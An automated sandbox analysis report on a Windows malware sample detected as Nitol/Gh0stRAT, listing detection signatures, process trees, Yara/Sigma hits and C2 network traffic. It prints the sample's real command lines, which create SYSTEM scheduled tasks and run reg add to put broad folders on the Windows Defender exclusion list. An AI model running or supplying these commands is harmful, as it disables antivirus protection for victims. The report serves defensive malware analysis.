Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2749837485743-7684385786.05.exe

Overview

General Information

Sample name:2749837485743-7684385786.05.exe
Analysis ID:1584634
MD5:5b695fabfcd1da54f7c193ef5f11ef6a
SHA1:8097a65d6e89522851b53b831aaf45afb9f0267b
SHA256:697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
Tags:backdoorexemsisilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Nitol
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 7tqorj.exe (PID: 2544 cmdline: C:\Users\user\Documents\7tqorj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • 7tqorj.exe (PID: 504 cmdline: C:\Users\user\Documents\7tqorj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • 7tqorj.exe (PID: 3476 cmdline: C:\Users\user\Documents\7tqorj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 5560 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 364 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4080 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3884 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6928 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3564 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 524 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 948 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3620 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3792 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5160 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6600 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6216 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6960 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6644 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 612 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • qNHTRl.exe (PID: 5052 cmdline: "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 1484 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3632 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5792 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 5756 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5504 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6188 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7072 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1456 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 3540 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • qNHTRl.exe (PID: 5032 cmdline: "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • NroRNr.exe (PID: 4800 cmdline: "C:\Program Files (x86)\2U36F\NroRNr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • NroRNr.exe (PID: 7136 cmdline: "C:\Program Files (x86)\2U36F\NroRNr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • qNHTRl.exe (PID: 2104 cmdline: "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      Process Memory Space: qNHTRl.exe PID: 5052JoeSecurity_NitolYara detected NitolJoe Security
        Process Memory Space: qNHTRl.exe PID: 5052PlugXStringsPlugX Identifying StringsSeth Hardy
        • 0x30668:$Dwork: d:\work
        • 0x6a4f2:$Dwork: d:\work
        • 0xa64e4:$Dwork: d:\work
        • 0xff401:$Shell6: Shell6
        • 0x1001e0:$Shell6: Shell6
        SourceRuleDescriptionAuthorStrings
        41.2.qNHTRl.exe.42403e8.5.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
          41.2.qNHTRl.exe.10000000.8.unpackJoeSecurity_NitolYara detected NitolJoe Security
            41.2.qNHTRl.exe.42403e8.5.unpackJoeSecurity_NitolYara detected NitolJoe Security
              5.2.7tqorj.exe.2880000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
              6.2.7tqorj.exe.2830000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
              Click to see the 1 entries

              System Summary

              barindex
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\7tqorj.exe, ParentImage: C:\Users\user\Documents\7tqorj.exe, ParentProcessId: 3476, ParentProcessName: 7tqorj.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 5560, ProcessName: cmd.exe
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\7tqorj.exe, ParentImage: C:\Users\user\Documents\7tqorj.exe, ParentProcessId: 3476, ParentProcessName: 7tqorj.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 5560, ProcessName: cmd.exe
              Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3632, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 5792, ProcessName: reg.exe
              Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5792, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T04:51:51.032072+010028529011Malware Command and Control Activity Detected192.168.2.6500008.217.59.738917TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Program Files (x86)\2U36F\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Source: C:\Program Files (x86)\qNHTRl\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\2U36F\tbcore3U.dllJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\qNHTRl\tbcore3U.dllJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 39.103.20.26:443 -> 192.168.2.6:49921 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49992 version: TLS 1.2
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000000.3231942330.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974096854.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974221880.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 0000002A.00000002.3271497279.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002A.00000000.3255146403.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, NroRNr.exe, 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002B.00000000.3258989374.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000000.3388721194.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000002.3399267881.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, qNHTRl.exe, 0000002F.00000000.3395908790.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002F.00000002.3402992961.0000000000818000.00000002.00000001.01000000.0000000A.sdmp
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb source: 2749837485743-7684385786.05.exe
              Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe, 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000005.00000000.2712564497.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000000.2722446315.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000002.2727976370.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000007.00000000.2792322207.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe.0.dr

              Change of critical system settings

              barindex
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA580A1B8 FindFirstFileExW,5_2_00007FFDA580A1B8
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DFFE
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDFF
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]5_2_0000000140011270
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DE96
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DEFB
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000E178
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDD9

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:50000 -> 8.217.59.73:8917
              Source: global trafficTCP traffic: 192.168.2.6:50000 -> 8.217.59.73:8917
              Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.73
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.73
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.59.73
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
